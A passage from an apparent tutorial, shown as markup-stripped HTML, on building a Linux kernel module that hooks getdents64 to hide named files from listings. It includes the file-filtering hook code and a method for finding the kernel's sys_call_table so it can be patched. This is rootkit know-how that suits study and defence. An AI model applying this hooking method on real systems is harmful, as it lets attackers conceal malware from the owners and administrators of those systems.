PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7716000/span/span span class="code-line"span class="go"read(3, quot;nodev\tsysfs\nnodev\trootfs\nnodev\trquot;..., 1024) = 260/span/span span class="code-line"span class="go"read(3, quot;quot;, 1024) = 0/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"munmap(0xb7716000, 4096) = 0/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/locale-archivequot;, O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/usr/share/locale/locale.aliasquot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=2570, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7716000/span/span span class="code-line"span class="go"read(3, quot;# Locale name alias data base.\n#quot;..., 4096) = 2570/span/span span class="code-line"span class="go"read(3, quot;quot;, 4096) = 0/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"munmap(0xb7716000, 4096) = 0/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.UTF-8/LC_IDENTIFICATIONquot;, O_RDONLY) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.utf8/LC_IDENTIFICATIONquot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=366, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 366, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7716000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"open(quot;/usr/lib/i386-linux-gnu/gconv/gconv-modules.cachequot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=26064, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 26064, PROT_READ, MAP_SHARED, 3, 0) = 0xb770f000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"futex(0xb76c2a8c, FUTEX_WAKE_PRIVATE, 2147483647) = 0/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.UTF-8/LC_MEASUREMENTquot;, O_RDONLY) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.utf8/LC_MEASUREMENTquot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=23, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 23, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb770e000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.UTF-8/LC_TELEPHONEquot;, O_RDONLY) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.utf8/LC_TELEPHONEquot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=56, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 56, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb770d000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.UTF-8/LC_ADDRESSquot;, O_RDONLY) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.utf8/LC_ADDRESSquot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=127, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 127, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb770c000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.UTF-8/LC_NAMEquot;, O_RDONLY) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.utf8/LC_NAMEquot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=77, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 77, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb770b000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.UTF-8/LC_PAPERquot;, O_RDONLY) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.utf8/LC_PAPERquot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=34, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 34, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb770a000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.UTF-8/LC_MESSAGESquot;, O_RDONLY) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.utf8/LC_MESSAGESquot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.utf8/LC_MESSAGES/SYS_LC_MESSAGESquot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=52, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 52, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7709000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.UTF-8/LC_MONETARYquot;, O_RDONLY) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.utf8/LC_MONETARYquot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=290, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 290, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7708000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.UTF-8/LC_COLLATEquot;, O_RDONLY) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.utf8/LC_COLLATEquot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=1170770, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 1170770, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb741f000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.UTF-8/LC_TIMEquot;, O_RDONLY) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.utf8/LC_TIMEquot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=2470, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 2470, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7707000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.UTF-8/LC_NUMERICquot;, O_RDONLY) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.utf8/LC_NUMERICquot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=54, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 54, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7706000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.UTF-8/LC_CTYPEquot;, O_RDONLY) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.utf8/LC_CTYPEquot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=256360, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 256360, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb73e0000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, {B38400 opost isig icanon echo ...}) = 0/span/span span class="code-line"span class="go"ioctl(1, TIOCGWINSZ, {ws_row=25, ws_col=80, ws_xpixel=0, ws_ypixel=0}) = 0/span/span span class="code-line"span class="go"open(quot;.quot;, O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY|O_CLOEXEC) = 3/span/span span class="code-line"span class="go"getdents64(3, /* 29 entries */, 32768) = 1024/span/span span class="code-line"span class="go"getdents64(3, /* 0 entries */, 32768) = 0/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"fstat64(1, {st_mode=S_IFCHR|0600, st_rdev=makedev(136, 1), ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7705000/span/span span class="code-line"span class="go"write(1, quot;hello.c hello.o\t reversquot;..., 71hello.c hello.o reverse_app reverse-app.c reverse.mod.o/span/span span class="code-line"span class="go") = 71/span/span span class="code-line"span class="go"write(1, quot;hello.ko Makefile\t reverquot;..., 67hello.ko Makefile reverse-app reverse.c reverse.o/span/span span class="code-line"span class="go") = 67/span/span span class="code-line"span class="go"write(1, quot;hello.mod.c modules.order revquot;..., 77hello.mod.c modules.order reverse-app2 reverse.ko reverse-test-app/span/span span class="code-line"span class="go") = 77/span/span span class="code-line"span class="go"write(1, quot;hello.mod.o Module.symvers revquot;..., 79hello.mod.o Module.symvers reverse-app2.c reverse.mod.c reverse-test-app.c/span/span span class="code-line"span class="go") = 79/span/span span class="code-line"span class="go"close(1) = 0/span/span span class="code-line"span class="go"munmap(0xb7705000, 4096) = 0/span/span span class="code-line"span class="go"close(2) = 0/span/span span class="code-line"span class="go"exit_group(0) = ?/span/span span class="code-line"/code/pre/div /td/tr/table pThis gives us lots of information, most of it is useless to us right now so we can use some shell-fu to get rid of it and only display the actual system calls that codels/code is using:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~/lkms# /spanstrace ls span class="m"1/spangt;/dev/null span class="m"2/spangt;/tmp/ls.stracespan class="p";/span cat /tmp/ls.strace span class="p"|/span cut -dspan class="s1"#39;(#39;/span -f1 span class="p"|/span sort -u/span span class="code-line"span class="go"access/span/span span class="code-line"span class="go"brk/span/span span class="code-line"span class="go"close/span/span span class="code-line"span class="go"execve/span/span span class="code-line"span class="go"exit_group/span/span span class="code-line"span class="go"fstat64/span/span span class="code-line"span class="go"futex/span/span span class="code-line"span class="go"getdents64/span/span span class="code-line"span class="go"getrlimit/span/span span class="code-line"span class="go"ioctl/span/span span class="code-line"span class="go"mmap2/span/span span class="code-line"span class="go"mprotect/span/span span class="code-line"span class="go"munmap/span/span span class="code-line"span class="go"open/span/span span class="code-line"span class="go"read/span/span span class="code-line"span class="go"rt_sigaction/span/span span class="code-line"span class="go"rt_sigprocmask/span/span span class="code-line"span class="go"set_robust_list/span/span span class="code-line"span class="go"set_thread_area/span/span span class="code-line"span class="go"set_tid_address/span/span span class="code-line"span class="go"statfs64/span/span span class="code-line"span class="go"uname/span/span span class="code-line"span class="go"write/span/span span class="code-line"/code/pre/div /td/tr/table pNow we have a decent list of system calls to look at we can use codeman/code to look at what these system calls do./p pAfter you have done that you will notice that codegetdents64/code strongget directory entries/strong is the one we want to look at, here is the prototype shown on the codeman/code page:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="nf"getdents/spanspan class="p"(/spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"fd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/span span class="nc"linux_dirent/spanspan class="w" /spanspan class="o"*/spanspan class="n"dirp/spanspan class="p",/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"count/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pThe man page also shows the declaration of the codelinux_dirent/code structure:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="w" /spanspan class="k"struct/span span class="nc"linux_dirent/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"long/spanspan class="w" /spanspan class="n"d_ino/spanspan class="p";/spanspan class="w" /spanspan class="cm"/* Inode number *//spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"long/spanspan class="w" /spanspan class="n"d_off/spanspan class="p";/spanspan class="w" /spanspan class="cm"/* Offset to next linux_dirent *//spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"short/spanspan class="w" /spanspan class="n"d_reclen/spanspan class="p";/spanspan class="w" /spanspan class="cm"/* Length of this linux_dirent *//spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"d_name/spanspan class="p"[];/spanspan class="w" /spanspan class="cm"/* Filename (null-terminated) *//spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="cm"/* length is actually (d_reclen - 2 -/span/span span class="code-line"span class="cm" offsetof(struct linux_dirent, d_name) *//spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="cm"/*/span/span span class="code-line"span class="cm" char pad; // Zero padding byte/span/span span class="code-line"span class="cm" char d_type; // File type (only since Linux 2.6.4;/span/span span class="code-line"span class="cm" // offset is (d_reclen - 1))/span/span span class="code-line"span class="cm" *//spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pThis will help us when figuring out how to iterate through the list returned by this syscall./p h2Taking A Closer Look/h2 pIf you want to have a look at how the system call is implemented, you can see where in the kernel it is implemented in code/usr/include/asm-generic/unistd.h/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~/lkms# /spangrep -B span class="m"1/span getdents64 /usr/include/asm-generic/unistd.h /span span class="code-line"span class="go"/* fs/readdir.c *//span/span span class="code-line"span class="gp"#/spandefine __NR_getdents64 span class="m"61/span/span span class="code-line"span class="go"__SC_COMP(__NR_getdents64, sys_getdents64, compat_sys_getdents64)/span/span span class="code-line"/code/pre/div /td/tr/table pSo getdents64 is implemented in codefs/readdir.c/code in the kernel source./p pstrongIts worth noting that it might not tell you the relevant source file on the line above, it depends on if there were multiple syscalls implemented in the same file, have a proper look through /usr/include/asm-generic/unistd.h to see what I mean/strong./p pOn my test machine this file is in code/usr/src/linux-source-3.14/fs/readdir.c/code because I have the source package installed:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~/lkms# /spangrep getdents64 /usr/src/linux-source-3.14/fs/readdir.c /span span class="code-line"span class="go"SYSCALL_DEFINE3(getdents64, unsigned int, fd,/span/span span class="code-line"span class="go" struct linux_dirent64 __user *, dirent, unsigned int, count)/span/span span class="code-line"/code/pre/div /td/tr/table pWe don't really need to know this for what we want to do but its handy to know if you are going to be kernel hacking./p pOne thing this has shown us is that codegetdents64/code takes the codelinux_dirent64/code struct and not the codelinux_dirent/code struct. After some more grepping we can see that this struct is defined in codeinclude/linux/dirent.h/code as:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="k"struct/span span class="nc"linux_dirent64/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"u64/spanspan class="w" /spanspan class="n"d_ino/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"s64/spanspan class="w" /spanspan class="n"d_off/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"short/spanspan class="w" /spanspan class="n"d_reclen/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"d_type/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"d_name/spanspan class="p"[/spanspan class="mi"0/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="p"};/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pThis is slightly different to codelinux_dirent/code and this means we will have to include codelinux/dirent.h/code in our LKM./p pIf we look at the number of entries that was returned to codels/code, we can see that it is the exact number of files in the current directory:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~/lkms# /spanstrace ls span class="m"2/spangt;span class="p"amp;/spanspan class="m"1/span span class="p"|/span grep getdents64/span span class="code-line"span class="go"getdents64(3, /* 29 entries */, 32768) = 1024/span/span span class="code-line"span class="go"getdents64(3, /* 0 entries */, 32768) = 0/span/span span class="code-line"span class="gp"[email protected]:~/lkms# /spanls -la span class="p"|/span wc -l/span span class="code-line"span class="go"30/span/span span class="code-line"/code/pre/div /td/tr/table pThere is 1 more in the codels -la/code because of the strongtotal/strong line at the top./p pUsing all of the information we have gathered we can create our hook function:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="n"asmlinkage/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"sys_getdents64_hook/spanspan class="p"(/spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"fd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/span span class="nc"linux_dirent64/spanspan class="w" /spanspan class="o"*/spanspan class="n"dirp/spanspan class="p",/spanspan class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"count/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"rtn/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"struct/span span class="nc"linux_dirent64/spanspan class="w" /spanspan class="o"*/spanspan class="n"cur/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"dirp/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"i/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"rtn/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"original_getdents64/spanspan class="p"(/spanspan class="n"fd/spanspan class="p",/spanspan class="w" /spanspan class="n"dirp/spanspan class="p",/spanspan class="w" /spanspan class="n"count/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"while/spanspan class="w" /spanspan class="p"(/spanspan class="n"i/spanspan class="w" /spanspan class="o"lt;/spanspan class="w" /spanspan class="n"rtn/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"strncmp/spanspan class="p"(/spanspan class="n"cur/spanspan class="o"-gt;/spanspan class="n"d_name/spanspan class="p",/spanspan class="w" /spanspan class="n"FILE_NAME/spanspan class="p",/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"FILE_NAME/spanspan class="p"))/spanspan class="w" /spanspan class="o"==/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"reclen/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"cur/spanspan class="o"-gt;/spanspan class="n"d_reclen/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"next_rec/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="n"cur/spanspan class="w" /spanspan class="o"+/spanspan class="w" /spanspan class="n"reclen/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"len/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="p"(/spanspan class="kt"int/spanspan class="p")/spanspan class="n"dirp/spanspan class="w" /spanspan class="o"+/spanspan class="w" /spanspan class="n"rtn/spanspan class="w" /spanspan class="o"-/spanspan class="w" /spanspan class="p"(/spanspan class="kt"int/spanspan class="p")/spanspan class="n"next_rec/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"memmove/spanspan class="p"(/spanspan class="n"cur/spanspan class="p",/spanspan class="w" /spanspan class="n"next_rec/spanspan class="p",/spanspan class="w" /spanspan class="n"len/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"rtn/spanspan class="w" /spanspan class="o"-=/spanspan class="w" /spanspan class="n"reclen/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"continue/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"i/spanspan class="w" /spanspan class="o"+=/spanspan class="w" /spanspan class="n"cur/spanspan class="o"-gt;/spanspan class="n"d_reclen/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"cur/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/span span class="nc"linux_dirent/spanspan class="o"*/spanspan class="p")/spanspan class="w" /spanspan class="p"((/spanspan class="kt"char/spanspan class="o"*/spanspan class="p")/spanspan class="n"dirp/spanspan class="w" /spanspan class="o"+/spanspan class="w" /spanspan class="n"i/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="n"rtn/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pHere we just run the actual system call, loop through the struct that is returned, searching each filename (codelinux_dirent64-gt;d_name/code) with the static constant codeFILE_NAME/code, and if it matches recalculating what is being returned./p h2The sys_call_table/h2 pThe sys_call_table is the table kept by the kernel containing all of the system calls and pointers to where they are in memory./p pWe need to do 2 things regarding this, firstly find the address of the sys_call_table and secondly figure out how to make this table writable (because by default this table is read only)./p pThe first part is pretty easy providing you don't want a portable version. The current kernels codeSystem.map/code file will tell us this:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~/lkms# /spangrep sys_call_table /boot/System.map-span class="sb"`/spanuname -rspan class="sb"`/span/span span class="code-line"span class="go"c1454100 R sys_call_table/span/span span class="code-line"/code/pre/div /td/tr/table pEasy enough, now to figure out how to make this writable./p pTo do this we need to change the a href="https://en.wikipedia.org/wiki/Page_table" target="_blank"page table/a entry relating to the address where codesys_call_table/code is stored./p pWe can get this entry using the codelookup_address/code function defined in codearch/x86/mm/pageattr.c/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="n"pte_t/spanspan class="w" /spanspan class="o"*/spanspan class="nf"lookup_address/spanspan class="p"(/spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"long/spanspan class="w" /spanspan class="n"address/spanspan class="p",/spanspan class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="o"*/spanspan class="n"level/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="n"__lookup_address_in_pgd/spanspan class="p"(/spanspan class="n"pgd_offset_k/spanspan class="p"(/spanspan class="n"address/spanspan class="p"),/spanspan class="w" /spanspan class="n"address/spanspan class="p",/spanspan class="w" /spanspan class="n"level/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pAs you can see it returns a pointer to some type of codepte_t/code structure. After a grep through the source again the definition of this structure is in codearch/x86/include/asm/pgtable_64_types.h/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="k"typedef/spanspan class="w" /spanspan class="k"struct/span span class="p"{/spanspan class="w" /spanspan class="n"pteval_t/spanspan class="w" /spanspan class="n"pte/spanspan class="p";/spanspan class="w" /spanspan class="p"}/spanspan class="w" /spanspan class="n"pte_t/spanspan class="p";/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pThis just contains 1 member (codepteval_t pte/code), luckily the definition of codepteval_t/code is in the same file:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan 